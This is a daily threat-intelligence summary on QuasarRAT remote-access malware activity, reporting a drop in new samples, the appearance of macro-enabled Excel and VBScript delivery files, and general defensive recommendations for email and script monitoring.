Daily Summary
QuasarRAT activity declined sharply today, with only 7 new samples detected compared to the 7-day average of 12 — a 40% drop. The trend is clearly downward, and no new C2 infrastructure was observed, suggesting a period of lower operational tempo or campaign consolidation.
New Samples Detected
The distribution of file types today is unusual. While executables (.exe) dominate with 5 samples, the presence of an .xlsm (macro-enabled Excel) and a .vbs (VBScript) file is notable. This mix is not typical for QuasarRAT, which usually relies almost exclusively on .exe payloads. The .xlsm and .vbs samples may indicate a shift toward initial infection via phishing attachments rather than direct executable downloads, possibly as a reaction to increased endpoint detection of bare .exe files.
Distribution Methods
The inclusion of macro-enabled Office documents and VBScript suggests a pivot to social engineering lures, likely delivered via email. This is a departure from recent campaigns that favored hosted executable links or archive attachments. The .vbs file in particular may be used to stage the download of the final QuasarRAT payload, avoiding initial scans that flag executables.
7-Day Trend
Today’s count of 7 samples marks a statistically significant deviation of 40% below the 7-day average of 12. This is the lowest single-day count observed in the past week. The declining trend could reflect temporary campaign fatigue, a shift in distribution scheduling, or preparation for a larger upcoming wave.
IOC Highlights
7 new IOCs were generated today, all tied to the newly analyzed samples. These consist primarily of file hashes and the embedded C2 server strings within the .exe files. Note that while no new C2 servers were identified (the existing 7-day infrastructure set is being reused), the .xlsm and .vbs samples each contain unique download URLs that warrant blocking.
Security Analysis
The reappearance of .xlsm and .vbs alongside QuasarRAT executables is a subtle but important signal. Prior to June, QuasarRAT had not used macro-based delivery in tracked samples for over 45 days. This could indicate an operator testing new initial access vectors after a period of reliance on executables. Defense teams should review email gateway rules for flagged .xlsm and .vbs attachments, even those with benign-sounding filenames, and ensure that macro execution is disabled for external documents. Additionally, monitoring for VBScript spawning PowerShell or certutil downloads from unknown IPs is recommended to intercept the pre-payload staging phase.